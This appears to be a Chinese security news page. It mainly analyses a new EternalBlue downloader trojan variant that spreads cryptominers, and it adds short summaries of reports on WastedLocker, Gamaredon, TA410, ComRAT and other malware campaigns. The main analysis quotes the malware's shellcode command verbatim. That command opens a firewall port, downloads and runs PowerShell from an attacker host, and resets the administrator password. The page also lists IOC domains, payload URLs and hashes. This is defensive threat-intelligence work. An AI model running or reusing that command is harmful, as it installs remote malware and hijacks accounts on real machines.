分类: 威胁情报

永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/YXnmVzAFVD5fc6lQIFWE1A   一、背景 腾讯安全威胁情报中心检测到永恒之蓝下载器木马再次出现新变种,此次变种利用Python打包EXE可执行文件进行攻击,该组织曾在2018年底使用过类似手法。腾讯安全大数据监测数据显示,永恒之蓝下载器最新变种出现之后便迅速传播,目前已感染约1.5万台服务器,中毒系统最终用于下载运行门罗币挖矿木马。 永恒之蓝下载器木马在不断演进更新过程中,曾将EXE攻击方式逐步切换到利用Powershell脚本实现无文件攻击。在其功能越来越庞大之后,该黑产团伙再次将永恒之蓝漏洞攻击利用、mssql爆破攻击的代码重新添加到EXE木马中,并对Powershell中相关代码进行屏蔽。 被本次变种攻击失陷后的系统会下载if.bin、下载运行由随机字符串命名的EXE攻击模块进行大规模的漏洞扫描和攻击传播,同时会下载门罗币挖矿木马占用服务器大量CPU资源挖矿,会给受害企业造成严重生产力损失。 腾讯安全专家建议企业网管参考腾讯安全响应清单,对企业网络资产进行安全检测,以及时消除永恒之蓝下载器木马的破坏活动: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)支持下发访问控制规则封禁目标端口,主动拦截永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相关访问流量。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的检测; 2)已支持查杀利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796、Redis未授权访问漏洞入侵的挖矿木马、后门程序。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 (Vulnerability Scan Service,VSS) 1)腾讯漏洞扫描服务(VSS)已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2)已集成无损检测POC,企业可以对自身资产进行远程检测。 关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)对利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序; 2)企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3)企业终端管理系统已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 附:永恒之蓝下载器木马历次版本更新情况如下: 时间 主要功能更新 2018年12月14日 利用“驱动人生”系列软件升级通道下载,利用“永恒之蓝”漏洞攻击传播。 2018年12月19日 下载之后的木马新增Powershell后门安装。 2019年1月9日 检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。 2019年1月24日 木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。 2019年1月25日 木马在1月24日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。 2019年2月10日 将攻击模块打包方式改为Pyinstaller。 2019年2月20日 更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。 2019年2月23日 攻击方法再次更新,新增MsSQL爆破攻击。 2019年2月25日 在2月23日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击。 2019年3月6日 通过已感染机器后门更新Powershell脚本横向传播模块ipc。 2019年3月8日 通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。 2019年3月14日 通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。 2019年3月28日 更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。 2019年4月3日 开创无文件挖矿新模式:挖矿脚本由PowerShell下载在内存中执行。 2019年7月19日 无文件攻击方法新增CVE-2017-8464 Lnk漏洞利用攻击,感染启动盘和网络共享盘,新增MsSQL爆破攻击。 2019年10月9日 新增Bluekeep漏洞CVE-2019-0708检测上报功能。 2020年2月12日 使用DGA域名,篡改hosts文件。 2020年4月3日 新增钓鱼邮件传播,邮件附件urgent.doc包含Office漏洞CVE-2017-8570。 2020年4月17日 钓鱼邮件新增附件readme.zip、readme.doc,新增Bypass UAC模块7p.php,创建readme.js文件感染可移动盘、网络共享盘 2020年5月21日 新增SMBGhost漏洞CVE-2020-0796检测上报功能,新增SSH爆破代码(未调用)。 2020年6月10日 新增SMBGhost漏洞CVE-2020-0796利用攻击,新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。 2020年6月24日 重新使用Python打包EXE攻击模块20.dat(C:\Windows\Temp\<random>.exe),负责永恒之蓝漏洞攻击、$IPC、SMB、mssql爆破攻击,其他攻击方式仍然通过Powershell实现。 二、样本分析 永恒之蓝下载器木马在Powershell攻击代码中,将扫描445端口进行攻击的$IPC爆破和永恒之蓝漏洞利用攻击功能进行了屏蔽。但以下功能仍然保留: 1.“永恒之蓝”漏洞利用MS17-010 2.Lnk漏洞利用CVE-2017-8464 3.Office漏洞利用CVE-2017-8570 4.RDP爆破 5.感染可移动盘、网络磁盘 6.钓鱼邮件(使用新冠病毒疫情相关主题) 7.SMBGhost漏洞利用CVE-2020-0796 8.SSH爆破攻击Linux系统 9.Redis未授权访问漏洞攻击Linux系统 然后在攻击后执行的Payload中添加一行代码,负责下载和执行EXE攻击模块 http[:]//d.ackng.com/ode.bin。 Ode.bin是经过加密的Powershell代码,解密后的内容主要完成以下功能: 生成4到8位字符组成的随机字符串作为文件名<random>.exe; 从http[:]//167.71.87.85/20.dat下载文件保存至C:\Windows\Temp\<random>.exe; 如果符合权限则创建计划任务”\Microsoft\Windows\<random>.exe “每50分钟执行一次20.dat,如果不符合权限则创建C:\Windows\Temp\\tt.vbs,通过VBS脚本代码创建计划任务“<random>.exe “,同样每50分钟执行一次20.dat。 通过计划任务执行的20.dat(拷贝至C:\Windows\Temp\<random>.exe md5: ef3a4697773f84850fe1a086db8edfe0)实际上是由Python代码打包的扫描攻击模块,与永恒之蓝下载器病毒2018年底第一次出现时的攻击模块C:\WINDOWS\Temp\svvhost.exe相似(参考https://www.freebuf.com/news/192015.html)。 该病毒在后来的逐步发展过程中,逐步将攻击代码转移到了Powershell实现,并且利用计划任务来动态获取和启动,不会在磁盘上留下文件,也就是“无文件攻击”模式攻击。而此次病毒重新启动exe攻击模块,可能是因为其功能不断扩展,需要将一部分代码进行分割,切割后的攻击模块及功能如下图所示。 If.bin中的Powershell攻击代码与上个版本相同,此处不再分析,分割出的xxx.exe中解码出Python实现的永恒之蓝漏洞攻击代码如下,另外还会执行$IPC、SMB、mssql弱口令爆破攻击: 攻击成功后执行shellcode 1、 下载和执行Powershell代码gim.jsp; 2、 修改administrator账户登陆密码为k8d3j9SjfS7并激活administrator账户; 3、 添加防火墙规则允许65529端口访问并开启监听。 cmd.exe /c netsh.exe firewall add portopening tcp 65529 DNS&netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53&powershell IEX(New-Object Net.WebClient).DownloadString(‘http[:]//t.amynx.com/gim.jsp’)&net user administrator k8d3j9SjfS7&net user administrator /active:yes gim.jsp是经过加密的Powershell代码,首先检测系统是否安装了以下杀软,如有调用卸载程序进行卸载: Eset、Kaspersky、avast、avp、Security、AntiVirus、Norton Security、Anti-Malware 然后安装一个计划任务“blackball”和一个随机名计划任务,定期下载和执行a.jsp(a.jsp继续下载和执行挖矿和攻击模块)。 IOCs Domain info.zz3r0.com info.amynx.com w.zz3r0.com IP 167.71.87.85 URL http[:]//167.71.87.85/20.dat http[:]//d.ackng.com/ode.bin http[:]//d.ackng.com/if.bin http[:]//t.amynx.com/gim.jsp http[:]//t.amynx.com/smgho.jsp http[:]//t.amynx.com/a.jsp md5 C:\Windows\Temp\<random>.exe ef3a4697773f84850fe1a086db8edfe0 8ec20f2cbad3103697a63d4444e5c062 ac48b1ea656b7f48c34e66d8e8d84537 d61d88b99c628179fa7cf9f2a310b4fb f944742b01606605a55c1d55c469f0c9 abd6f640423a9bf018853a2b40111f76 57812bde13f512f918a0096ad3e38a07 d8e643c74996bf3c88325067a8fc9d78 125a6199fd32fafec11f812358e814f2 fb880dc73e4db0a43be8a68ea443bfe1 8d46dbe92242a4fde2ea29cc277cca3f 48fbe4b6c9a8efc11f256bda33f03460 gim.jsp 98f48f31006be66a8e07b0ab189b6d02 a.jsp 6bb4e93d29e8b78e51565342b929c824 ode.bin e009720bd4ba5a83c4b0080eb3aea1fb if.bin 092478f1e16cbddb48afc3eecaf6be68 smgho.jsp ca717602f0700faba6d2fe014c9e6a8c 参考链接: 《“黑球”行动再升级,SMBGhost漏洞攻击进入实战》 https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA

WastedLocker:赛门铁克确定了针对美国组织的攻击浪潮

Broadcom旗下的赛门铁克发现并警告用户:攻击者试图部署WastedLocker勒索软件,对美国公司进行了一系列攻击。这些攻击的最终目标是通过对受害者的大多数计算机和服务器进行加密来削弱受害者的IT基础架构,以要求获得数百万美元的赎金,目前至少有31个组织受到了攻击,这意味着攻击者已经破坏了目标组织的网络,并且正在为勒索软件攻击奠定基础。 是一种相对较新的定向勒索软件,在NCC Group发布之前就已被记录,而赛门铁克正在对受影响的网络进行扩展。WastedLocker被归因于臭名昭著的“Evil Corp”网络犯罪组织,Evil Corp曾与Dridex银行木马和BitPaymer勒索软件相关联,勒索金额高达数千万美元。两名涉嫌参与该组织的俄罗斯男子在美国对他们进行了公开起诉。 这些攻击始于一个名为SocGholish的基于javascript的恶意框架,该框架被追踪到超过150个受到威胁的网站伪装成软件进行更新。一旦攻击者进入了受害者的网络,他们就会使用Cobalt Strike恶意软件和一些非本土工具来盗取身份证件,升级特权,然后在网络中进行移动,以便在多台电脑上部署WastedLocker勒索软件。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1248/     消息来源:symantec-enterprise-blogs,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

针对知名航天和军事公司的攻击活动分析

去年年底,我们发现了针对欧洲和中东地区的航空航天和军事公司的攻击活动,该攻击在2019年9月至2019年12月非常活跃。通过对两家受影响的欧洲公司的深入调查,我们对其攻击活动进行了深入了解,发现了之前从未被记录的恶意软件。 本文将对攻击活动的具体情况进行分析,完整的分析报告可查看白皮书《运营感知:针对欧洲航空航天和军事公司的针对性攻击》。 基于名为Inception.dll的相关恶意软件样本,我们将这些攻击称为“操作感知”,发现这些攻击活动具有很高的针对性。 为了危及目标,攻击者以诱人的虚假工作机会为幌子。在取得信任后,开始部署了自定义的多级恶意软件以及修改过的开源工具。除此之外还采用“陆上生存”策略,滥用合法工具和操作系统功能,使用多种技术来避免检测(其中包括代码签名、定期对恶意软件进行重新编译以及冒充合法公司来进行诈骗)。 我们调查了解到该行动的主要目标是间谍活动。但是在调查的某个案例中发现攻击者试图通过商业电子邮件折衷攻击(BEC)将访问受害者电子邮件帐户的权限货币化。虽然我们没有找到有力的证据将攻击与已知的威胁行为者联系起来,但发现了一些可能与Lazarus集团有联系的线索(其中包括定位目标、开发环境和使用的技术分析)。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1248/     消息来源:welivesecurity,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Valak 恶意软件与 Gozi ConfCrew 的千丝万缕联系

Valak是使用基于脚本的多阶段恶意软件,该软件劫持电子邮件并嵌入恶意URL附件,以使用无文件脚本来感染设备。 相关摘要 Valak使用了基于脚本的恶意软件,这些恶意软件在广告活动中使用,其与Gozi ConfCrew相关联。 重复的攻击活动导致一些报道将Valak误认为是Gozi。 电子邮件被收集起来并运用在“回复链攻击”中,以专门构建插件“ exchgrabber”来进一步传播。 新发现的名为“ clientgrabber”的插件还用于从注册表中窃取电子邮件凭据。 有关Varak详情请见报告:https://assets.sentinelone.com/labs/sentinel-one-valak-i   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1246/     消息来源:sentinelone,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Gamaredon 威胁组织活动相关分析

研究人员发现,高度活跃的Gamaredon威胁组织在各种恶意活动中使用了未被记录的工具,其中一个是针对微软Outlook的VBA宏(使用电子邮件向受害者的Microsoft Office通讯簿中的联系人发送鱼叉式钓鱼邮件)。我们还进一步分析了Gamaredon工具,这些工具能够将恶意宏和远程模板注入到现有的Office文档中。 自2013年起Gamaredon组织开始活跃。CERT-UA和乌克兰其他官方机构的报告中证实了它曾对乌克兰机构发起了袭击。在过去的几个月里,这个群体的活动有所增加,不断有恶意邮件袭击他们目标的邮箱。这些电子邮件的附件是带有恶意宏的文档,在执行时会尝试下载多种不同的恶意软件变种。Gamaredon使用了许多不同的编程语言,从 c#到VBScript、批处理文件和c/c++。 Gamaredon使用的工具非常简单,旨在从受到威胁的系统中收集敏感信息并进一步传播。与其他APT组织不同的是,Gamaredon组织行为却非常高调。尽管他们的工具具有下载和执行更隐秘的任意二进制文件的能力,但该小组的主要重点却是在试图窃取数据的同时,在目标网络中尽可能快地传播。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1245/     消息来源:welivesecurity,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

NetWalker 勒索软件相关分析

Netwalker (又名 Mailto)勒索软件近期十分活跃。 由于新型冠肺炎的爆发,一些活跃的勒索软黑客们开始不再攻击医疗目标,但NetWalker 勒索软件却是例外。 这款勒索软件的赎金要求很高,很多受害者们因无法支付相关赎金导致数据被泄露。 最近美国的教育机构也成为了勒索软件的重点攻击目标,密歇根州立大学、加州大学旧金山分校和哥伦比亚大学芝加哥分校都没有幸免。近期的RaaS(勒索软件即服务)模式转变加剧了勒索的范围,导致网络检测和清理不再足以确保组织数据机密的安全,预防成为了面对威胁的唯一解决办法。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1243/     消息来源:sentinelone,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

TA410:针对美国公用事业部门的攻击组织再出新的恶意软件

去年8月,Proofpoint研究人员发现LookBack恶意软件在该年7月至8月间针对美国公用事业部门发起了网络攻击。通过分析8月21日至29发起的活动发现,这些攻击活动还利用恶意宏向美国各地的攻击目标发送恶意软件。与此同时,研究人员还发现了一个全新的恶意软件家族FlowCloud,这个家族也被交付给了美国的公用事业提供商。 像LookBack这样的FlowCloud恶意软件可以使攻击者完全控制受感染的系统。它的远程访问木马(RAT)功能包括访问已安装的应用程序、键盘、鼠标、屏幕、文件和服务进程,并通过这些命令控制来泄露信息。 通过观察2019年7月至11月间的网络钓鱼活动,基于威胁参与者使用共享附件宏、恶意软件安装技术和重叠交付基础结构我们可以确定LookBack和FlowCloud恶意软件都归因于我们称为TA410的威胁参与者。 此外,我们还发现TA410和TA429(APT10)之间的相似之处。具体来讲,他们之间有共同的附件宏,而且2019年11月检测到的TA410活动中还包括网络钓鱼附件传递宏中使用的与TA429(APT10)相关的基础结构。但是,Proofpoint分析师认为,黑客们可能是在故意使用TA429(APT10)技术和基础架构来进行虚假标记。因此,在进行研究时我们不会将LookBack和FlowCloud活动归因于TA429(APT10)。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1241/     消息来源:proofpoint, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Higaisa APT 相关新的 LNK 攻击分析

5月29日,我们发现了一起网络攻击事件,我们认为这该事件是由一名叫做Higaisa的渗透攻击黑客发起的。有关信息显示:Higaisa APT与朝鲜半岛有关,并于2019年初被腾讯安全威胁情报中心进行了首次披露。 该小组的活动可以追溯到2016年,活动内容包括使用特洛伊木马(例如Gh0st和PlugX)以及移动恶意软件,活动目标包括政府官员、人权组织以及与朝鲜有关的其他实体企业。 在近期的攻击活动中,Higaisa使用了一个恶意快捷文件,该文件最终导致了一个包含恶意脚本、有效载荷和欺诈PDF文档内容的多阶段攻击行为。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1235/     消息来源:malwarebytes, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

ShellReset RAT 利用基于恶意宏的 word 文档传播

之前我们说到:网络犯罪分子通常会将攻击点与热点相联系。近期,我们就发现有犯罪分子使用伦敦技术事件做诱饵来进行网络攻击。 2020年2月-5月,我们观察到在基于.space和.xyz域的新注册站点上托管了四个基于恶意宏的Microsoft Word文档。由于几个文档的最终有效负载的部署策略、技术和过程(TTP)十分类似,我们认为这是同一个攻击者的行为。 据了解,.NET有效负载的最终版以往从未被检测到过,它的代码段很小,而且与QuasarRAT相重叠,但此代码段在运行时并未使用。根据最终有效负载中的唯一字符串我们为把该RAT命名为ShellReset。由于被检测到的数量有限,我们认为这可能是是一种小范围的攻击活动,而攻击者在这个攻击过程中使用的主题也和今年在伦敦发生的热点事件有关,其中还包括5G Expo 和Futurebuild。 其中的感染链涉及一些有趣的技术,如在运行时使用受信任的Windows实用程序在终端上编译有效负载以绕过安全机制,还会从攻击者的服务器下载混淆后的源代码。本文我将对分发策略和攻击的技术进行详细分析。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1228/     消息来源:zscaler, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

从 Agent.BTZ 到 ComRAT v4 的十年发展历程

ESET研究人员近期发现了由Turla组织ComRAT经营的恶意软件的更新版本。Turla,也被称为Snake,是一个臭名昭著的间谍组织,已经活跃了十多年,之前也介绍过许多该组织的活动。 ComRAT,也称为Agent.BTZ,是一种用于远程访问特洛伊木马(RAT),该木马在2008年因违反美国军方使用规则声名狼藉。该恶意软件的第一版(约在2007年发布)通过传播可移动驱动器来展现蠕虫功能。从2007年到2012年,已经发布了RAT的两个主要版本。有趣的是,它们都使用了著名的Turla XOR密钥: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 2017年,Turla开发人员对ComRAT进行了一些更改,但这些变体仍然是从相同的代码库中派生出来的,相关研究报告请见https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf。此外还发布了不同的ComRAT版本。这个新版本使用了全新的代码库,相比之前的版本会复杂很多。以下是该恶意软件的几个特征: ComRAT v4于2017年首次亮相,直到2020年1月仍在使用。 其至少确定了三个攻击目标:两个外交部和一个国民议会。 ComRAT用于窃取敏感文档,运营商使用OneDrive和4shared等云服务来窃取数据。 ComRAT是用C ++开发的复杂后门程序。 ComRAT使用FAT16格式化的虚拟FAT16文件系统。 其使用现有的访问方法(例如PowerStalli on PowerShell后门)部署ComRAT。 ComRAT具有两个命令和控制通道: 1.HTTP:它使用与ComRAT v3完全相同的协议; 2.电子邮件:它使用Gmail网络界面接收命令并窃取数据。 ComRAT可以在受到感染的计算机上执行如泄露其他程序或文件的操作。   …… 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1222/     消息来源:welivesecurity, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接